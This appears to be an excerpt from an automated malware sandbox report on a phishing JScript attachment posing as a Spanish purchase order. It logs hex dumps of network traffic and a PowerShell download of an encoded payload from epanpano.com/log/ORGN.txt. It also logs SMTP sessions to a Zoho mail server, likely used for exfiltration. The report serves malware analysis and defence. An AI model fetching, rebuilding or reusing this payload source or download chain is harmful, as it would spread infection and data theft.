90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c Data Ascii: ;e'/du%opW+!k'G\|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@XMUaVEy~x%K:]I[&FDW:dvy\|f
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28 Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a\|c(
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ\|"(oW$GSW<D}#8{[k$@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR< tU"Ye6EV\|z,y<=]XC$v
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c Data Ascii: 62upG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH}XMO(VrG
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43 Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G\|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h\|b@?_{%iJ_$U`L\|%'urC
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
2024-08-30 07:27:59 UTC	16384	IN	Data Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49 Data Ascii: is"ydPTg_4wA\|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytxn\|6^xq]$nSx6(H1VFRd$z~~UI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	78.142.208.13	443	7552	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 07:28:02 UTC	74	OUT	GET /log/ORGN.txt HTTP/1.1 Host: epanpano.com Connection: Keep-Alive
2024-08-30 07:28:02 UTC	193	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Thu, 29 Aug 2024 13:54:35 GMT accept-ranges: bytes content-length: 334508 date: Fri, 30 Aug 2024 07:28:01 GMT
2024-08-30 07:28:02 UTC	1175	IN	Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-08-30 07:28:02 UTC	14994	IN	Data Raw: 64 69 30 7a 63 75 78 57 62 34 42 79 63 6c 64 57 5a 73 6c 6d 64 70 4a 48 55 6b 56 47 64 7a 56 57 64 78 56 6d 63 38 41 43 49 67 41 43 49 67 6f 51 44 2b 6b 48 64 70 4a 58 64 6a 56 32 63 38 41 43 49 67 41 69 43 4e 34 6a 49 79 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 38 6d 5a 75 6c 45 64 7a 56 6e 63 30 78 44 49 67 6f 51 44 2b 38 69 49 77 42 58 59 75 34 32 62 70 52 58 59 6a 6c 47 62 77 42 58 51 35 31 6b 49 39 55 57 62 68 35 47 49 69 41 6a 4c 77 34 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 Data Ascii: di0zcuxWb4BycldWZslmdpJHUkVGdzVWdxVmc8ACIgACIgoQD+kHdpJXdjV2c8ACIgAiCN4jIyYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1Geg8mZulEdzVnc0xDIgoQD+8iIwBXYu42bpRXYjlGbwBXQ51kI9UWbh5GIiAjLw4CMuEjI942bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzV
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 4e 44 41 41 6b 43 41 39 42 41 57 41 41 44 41 37 42 41 65 41 41 44 41 6f 41 41 49 41 30 48 41 77 41 77 65 41 41 43 41 36 41 51 5a 41 6f 48 41 70 42 77 55 41 55 47 41 79 42 77 62 41 51 48 41 54 39 43 41 41 6b 43 41 39 42 41 4d 41 73 48 41 6f 41 41 49 41 67 44 41 67 41 67 62 41 45 47 41 6f 42 41 64 41 41 43 41 7a 42 77 63 41 55 47 41 73 42 41 49 41 4d 48 41 70 42 41 49 41 55 47 41 79 42 77 62 41 51 48 41 54 42 51 65 41 51 48 41 79 42 51 5a 41 41 48 41 76 42 67 63 41 41 46 41 6b 42 51 5a 41 6f 48 41 70 42 41 62 41 45 47 41 70 42 67 63 41 55 47 41 54 42 41 49 41 55 47 41 6f 42 41 64 41 41 43 41 6d 42 77 62 41 41 43 41 6c 42 67 65 41 6b 47 41 54 46 48 41 41 30 48 41 59 42 67 4f 41 41 44 41 37 42 41 65 41 41 44 41 67 41 67 4f 41 51 45 41 4a 64 42 41 41 6b 43 41 Data Ascii: NDAAkCA9BAWAADA7BAeAADAoAAIA0HAwAweAACA6AQZAoHApBwUAUGAyBwbAQHAT9CAAkCA9BAMAsHAoAAIAgDAgAgbAEGAoBAdAACAzBwcAUGAsBAIAMHApBAIAUGAyBwbAQHATBQeAQHAyBQZAAHAvBgcAAFAkBQZAoHApBAbAEGApBgcAUGATBAIAUGAoBAdAACAmBwbAACAlBgeAkGATFHAA0HAYBgOAADA7BAeAADAgAgOAQEAJdBAAkCA
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 42 67 63 41 55 47 41 30 42 41 64 41 55 47 41 48 42 41 55 41 51 46 41 47 42 41 58 74 41 41 41 2b 41 67 63 41 55 47 41 32 42 67 63 41 55 47 41 7a 42 41 50 52 41 41 41 79 42 51 5a 41 51 48 41 30 42 51 5a 41 63 45 41 51 42 41 56 41 59 30 45 41 41 41 64 41 67 48 41 30 42 67 4c 41 51 48 41 7a 42 51 61 41 77 47 41 77 42 41 64 41 59 45 41 63 42 67 63 41 55 47 41 6b 42 67 62 41 45 47 41 74 42 51 62 41 38 47 41 44 42 41 49 41 41 46 41 55 42 67 52 41 77 46 41 70 41 67 4e 41 67 44 41 34 42 41 4b 41 41 43 41 7a 42 51 5a 41 77 47 41 70 42 67 52 41 41 43 41 74 42 51 59 41 49 48 41 6e 42 77 62 41 49 48 41 51 42 41 58 41 55 47 41 79 42 77 62 41 51 48 41 54 42 41 62 41 45 47 41 31 42 41 64 41 49 48 41 70 42 67 56 41 77 31 64 41 41 41 64 41 67 48 41 30 42 67 4c 41 51 48 41 Data Ascii: BgcAUGA0BAdAUGAHBAUAQFAGBAXtAAA+AgcAUGA2BgcAUGAzBAPRAAAyBQZAQHA0BQZAcEAQBAVAY0EAAAdAgHA0BgLAQHAzBQaAwGAwBAdAYEAcBgcAUGAkBgbAEGAtBQbA8GADBAIAAFAUBgRAwFApAgNAgDA4BAKAACAzBQZAwGApBgRAACAtBQYAIHAnBwbAIHAQBAXAUGAyBwbAQHATBAbAEGA1BAdAIHApBgVAw1dAAAdAgHA0BgLAQHA
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 31 57 64 74 6c 47 65 68 31 30 58 30 56 32 63 41 4d 6e 62 76 6c 47 64 6a 56 47 62 73 39 32 51 75 30 57 5a 30 4e 58 65 54 42 77 63 75 39 57 61 30 46 6d 63 6c 52 58 61 41 4d 6e 62 76 6c 32 63 7a 56 6d 63 77 68 58 52 79 46 47 62 31 64 57 5a 53 35 43 64 34 56 47 56 75 30 57 5a 30 4e 58 65 54 42 77 63 75 39 57 61 7a 35 57 5a 30 68 58 52 75 49 57 5a 58 35 53 62 6c 52 33 63 35 4e 46 41 7a 35 57 61 68 52 6e 62 76 4e 45 41 7a 31 6d 63 76 5a 6b 4c 7a 64 33 62 6b 35 57 61 58 35 53 62 6c 52 33 63 35 4e 46 41 7a 31 57 5a 30 6c 55 5a 30 46 6d 63 6c 31 57 64 75 56 45 64 73 56 58 59 57 42 77 63 74 46 6d 63 68 42 56 5a 30 46 57 5a 79 4e 45 41 7a 78 57 59 31 46 58 52 41 4d 48 62 68 6c 47 64 75 56 47 5a 6c 4a 33 51 30 78 57 64 68 5a 57 5a 45 56 32 63 56 39 46 64 6c 4e 48 41 Data Ascii: 1WdtlGeh10X0V2cAMnbvlGdjVGbs92Qu0WZ0NXeTBwcu9Wa0FmclRXaAMnbvl2czVmcwhXRyFGb1dWZS5Cd4VGVu0WZ0NXeTBwcu9Waz5WZ0hXRuIWZX5SblR3c5NFAz5WahRnbvNEAz1mcvZkLzd3bk5WaX5SblR3c5NFAz1WZ0lUZ0Fmcl1WduVEdsVXYWBwctFmchBVZ0FWZyNEAzxWY1FXRAMHbhlGduVGZlJ3Q0xWdhZWZEV2cV9FdlNHA
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 6c 46 41 69 64 6a 51 73 4a 45 41 69 64 54 4f 61 31 6d 63 7a 6c 46 41 69 64 54 4f 50 78 6d 55 72 42 51 59 35 68 45 57 42 46 7a 63 74 6c 48 41 68 56 48 54 52 68 7a 63 32 41 51 59 30 39 57 64 52 52 58 5a 54 42 51 59 30 46 47 5a 41 45 47 64 68 52 55 65 30 4a 58 5a 77 39 6d 63 51 42 51 59 30 46 47 52 77 42 51 59 30 46 47 52 6f 52 58 64 42 4a 47 63 41 45 47 64 68 52 45 61 30 56 58 51 69 4e 47 41 68 52 58 59 45 52 57 5a 30 4e 57 5a 30 39 6d 63 51 42 51 59 30 46 47 52 69 4e 47 41 68 52 58 59 45 39 46 64 6c 4e 48 41 68 52 58 59 45 39 46 64 6c 64 47 41 68 46 58 59 46 70 45 41 68 35 47 4d 41 45 47 61 50 5a 57 57 47 42 51 59 6b 42 33 4d 30 45 31 52 41 45 47 5a 73 42 51 59 51 5a 33 52 6d 74 45 57 41 45 57 54 72 52 54 4f 34 78 47 41 68 78 30 52 42 5a 7a 52 70 64 7a 53 Data Ascii: lFAidjQsJEAidTOa1mczlFAidTOPxmUrBQY5hEWBFzctlHAhVHTRhzc2AQY09WdRRXZTBQY0FGZAEGdhRUe0JXZw9mcQBQY0FGRwBQY0FGRoRXdBJGcAEGdhREa0VXQiNGAhRXYERWZ0NWZ09mcQBQY0FGRiNGAhRXYE9FdlNHAhRXYE9FdldGAhFXYFpEAh5GMAEGaPZWWGBQYkB3M0E1RAEGZsBQYQZ3RmtEWAEWTrRTO4xGAhx0RBZzRpdzS
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 45 51 50 41 77 4e 41 49 45 41 4f 41 67 4e 41 49 45 77 4d 41 51 4e 41 49 45 67 4c 41 41 4e 41 49 45 51 4b 41 77 4d 41 49 45 41 4a 41 67 4d 41 49 45 77 48 41 51 4d 41 49 45 67 47 41 41 4d 41 49 45 51 46 41 77 4c 41 49 45 41 45 41 67 4c 41 49 45 77 43 41 51 4c 41 49 45 67 42 41 41 4c 41 49 45 51 41 41 77 4b 41 49 41 41 41 41 45 43 41 4f 41 41 41 41 30 42 41 4f 51 79 6a 44 67 73 41 42 6f 42 49 51 46 4d 42 35 53 53 4d 73 45 58 41 70 36 41 44 59 30 56 41 6b 53 69 59 71 4d 49 41 4d 53 79 4e 6e 49 54 41 70 53 53 4d 73 55 58 41 70 4b 41 36 46 35 53 41 5a 58 41 53 43 78 47 41 4d 75 67 4a 59 30 56 41 73 75 51 59 43 68 55 41 73 4b 67 4a 4f 31 51 41 30 4b 67 4a 4f 31 51 41 38 75 41 64 52 5a 62 41 45 54 53 46 77 73 59 41 70 43 42 72 71 30 57 41 45 6a 78 77 4d 56 51 41 Data Ascii: EQPAwNAIEAOAgNAIEwMAQNAIEgLAANAIEQKAwMAIEAJAgMAIEwHAQMAIEgGAAMAIEQFAwLAIEAEAgLAIEwCAQLAIEgBAALAIEQAAwKAIAAAAECAOAAAA0BAOQyjDgsABoBIQFMB5SSMsEXAp6ADY0VAkSiYqMIAMSyNnITApSSMsUXApKA6F5SAZXASCxGAMugJY0VAsuQYChUAsKgJO1QA0KgJO1QA8uAdRZbAETSFwsYApCBrq0WAEjxwMVQA
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 43 41 41 41 41 41 4b 43 42 77 36 43 38 59 51 75 68 67 68 41 41 41 41 41 67 53 4f 41 73 75 41 32 45 30 59 49 59 49 41 41 41 41 41 6f 45 44 41 70 4c 67 79 52 42 43 41 52 43 41 41 41 45 51 56 4d 41 51 36 43 45 49 44 33 44 51 67 41 41 41 41 42 49 46 75 41 6b 75 41 42 61 77 4a 41 45 49 41 41 41 51 41 51 68 42 41 70 4c 51 67 57 59 61 41 6d 44 41 41 41 45 77 54 49 42 41 36 43 38 34 4e 57 69 67 68 41 41 41 41 41 67 43 4b 41 67 75 41 32 63 6a 68 4a 59 4f 41 41 41 41 41 6f 41 43 41 6f 44 67 45 43 78 47 47 47 43 41 41 41 41 41 4b 4e 41 77 35 44 63 42 4d 73 43 51 6b 41 41 41 41 42 73 45 30 41 63 75 41 42 61 68 70 42 59 4f 41 41 41 51 41 45 68 41 41 6d 4c 77 6a 33 59 4a 43 47 43 41 41 41 41 41 4b 45 41 67 35 43 59 7a 4e 47 6d 67 35 41 41 41 41 41 63 43 2f 41 59 4f 41 Data Ascii: CAAAAAKCBw6C8YQuhghAAAAAgSOAsuA2E0YIYIAAAAAoEDApLgyRBCARCAAAEQVMAQ6CEID3DQgAAAABIFuAkuABawJAEIAAAQAQhBApLQgWYaAmDAAAEwTIBA6C84NWighAAAAAgCKAguA2cjhJYOAAAAAoACAoDgECxGGGCAAAAAKNAw5DcBMsCQkAAAABsE0AcuABahpBYOAAAQAEhAAmLwj3YJCGCAAAAAKEAg5CYzNGmg5AAAAAcC/AYOA
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 34 50 57 41 41 41 41 42 41 43 41 48 77 67 2f 41 41 41 41 58 6b 54 41 2b 44 41 41 41 77 41 49 41 67 41 44 2b 44 41 41 49 34 67 2f 41 41 41 41 47 41 43 41 47 34 67 2f 41 45 41 44 2b 44 41 41 41 45 52 4f 42 34 50 41 41 41 51 42 67 41 41 43 4d 34 50 41 41 67 67 44 2b 44 41 41 41 73 41 49 6d 59 41 41 43 41 48 4b 41 41 51 41 45 41 43 41 44 77 67 2f 41 55 41 44 2b 44 41 41 41 77 52 4f 42 34 50 41 41 41 67 43 67 41 41 43 4d 34 50 41 41 67 67 44 2b 44 41 41 41 55 41 49 41 4d 67 44 2b 72 41 41 41 67 33 63 41 41 51 41 45 41 43 41 41 41 77 46 35 45 67 2f 41 41 41 41 45 41 43 41 49 77 67 2f 41 41 41 43 4f 34 50 41 41 41 41 42 67 41 67 41 4f 34 76 43 41 49 67 58 7a 6c 6d 6a 41 45 41 44 2b 44 41 41 41 67 52 4f 42 34 50 41 41 41 77 41 67 41 41 43 4d 34 50 41 41 67 67 44 Data Ascii: 4PWAAAABACAHwg/AAAAXkTA+DAAAwAIAgAD+DAAI4g/AAAAGACAG4g/AEAD+DAAAEROB4PAAAQBgAACM4PAAggD+DAAAsAImYAACAHKAAQAEACADwg/AUAD+DAAAwROB4PAAAgCgAACM4PAAggD+DAAAUAIAMgD+rAAAg3cAAQAEACAAAwF5Eg/AAAAEACAIwg/AAACO4PAAAABgAgAO4vCAIgXzlmjAEAD+DAAAgROB4PAAAwAgAACM4PAAggD
2024-08-30 07:28:02 UTC	16384	IN	Data Raw: 34 50 46 41 41 41 41 4f 6b 54 41 2b 44 41 41 41 59 41 49 41 30 41 44 2b 44 41 41 4e 34 67 2f 41 41 41 41 45 41 43 41 41 34 67 2f 4b 41 67 41 6d 4d 48 42 41 41 77 48 2b 42 41 41 41 63 52 4f 42 34 50 41 41 41 77 41 67 41 51 44 4d 34 50 41 41 30 67 44 2b 44 41 41 41 55 41 49 41 45 67 44 2b 72 41 41 43 59 79 63 45 41 41 41 64 34 48 41 41 41 77 46 35 45 67 2f 41 41 41 41 45 41 43 41 4e 77 67 2f 41 41 51 44 4f 34 50 41 41 41 77 46 67 41 41 41 44 73 58 4f 41 49 51 43 2b 44 41 41 41 49 52 4f 42 34 50 41 41 41 67 46 67 41 51 44 4d 34 50 41 41 30 67 44 2b 44 41 41 41 38 41 49 4b 41 67 41 6c 38 47 63 41 30 55 64 79 42 51 42 4d 34 50 41 41 41 77 46 35 45 67 2f 41 41 41 41 4f 41 43 41 4e 77 67 2f 41 41 51 44 4f 34 50 41 41 41 77 41 67 6f 43 41 41 41 67 43 35 45 67 2f Data Ascii: 4PFAAAAOkTA+DAAAYAIA0AD+DAAN4g/AAAAEACAA4g/KAgAmMHBAAwH+BAAAcROB4PAAAwAgAQDM4PAA0gD+DAAAUAIAEgD+rAACYycEAAAd4HAAAwF5Eg/AAAAEACANwg/AAQDO4PAAAwFgAAADsXOAIQC+DAAAIROB4PAAAgFgAQDM4PAA0gD+DAAA8AIKAgAl8GcA0UdyBQBM4PAAAwF5Eg/AAAAOACANwg/AAQDO4PAAAwAgoCAAAgC5Eg/

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 30, 2024 09:28:05.599658012 CEST	587	49733	185.230.212.164	192.168.2.4	220 mx.zoho.eu SMTP Server ready August 30, 2024 9:28:05 AM CEST
Aug 30, 2024 09:28:05.599992990 CEST	49733	587	192.168.2.4	185.230.212.164	EHLO 610930
Aug 30, 2024 09:28:05.600251913 CEST	587	49733	185.230.212.164	192.168.2.4	220 mx.zoho.eu SMTP Server ready August 30, 2024 9:28:05 AM CEST
Aug 30, 2024 09:28:05.937203884 CEST	587	49733	185.230.212.164	192.168.2.4	250-mx.zoho.eu Hello 610930 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Aug 30, 2024 09:28:05.937542915 CEST	49733	587	192.168.2.4	185.230.212.164	STARTTLS
Aug 30, 2024 09:28:06.116431952 CEST	587	49733	185.230.212.164	192.168.2.4	220 Ready to start TLS.
Aug 30, 2024 09:28:09.915947914 CEST	587	49734	185.230.212.164	192.168.2.4	220 mx.zoho.eu SMTP Server ready August 30, 2024 9:28:09 AM CEST
Aug 30, 2024 09:28:09.916085958 CEST	49734	587	192.168.2.4	185.230.212.164	EHLO 610930
Aug 30, 2024 09:28:10.091660023 CEST	587	49734	185.230.212.164	192.168.2.4	250-mx.zoho.eu Hello 610930 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Aug 30, 2024 09:28:10.091828108 CEST	49734	587	192.168.2.4	185.230.212.164	STARTTLS
Aug 30, 2024 09:28:10.272582054 CEST	587	49734	185.230.212.164	192.168.2.4	220 Ready to start TLS.

Target ID:	0
Start time:	03:27:53
Start date:	30/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js"
Imagebase:	0x7ff6867f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
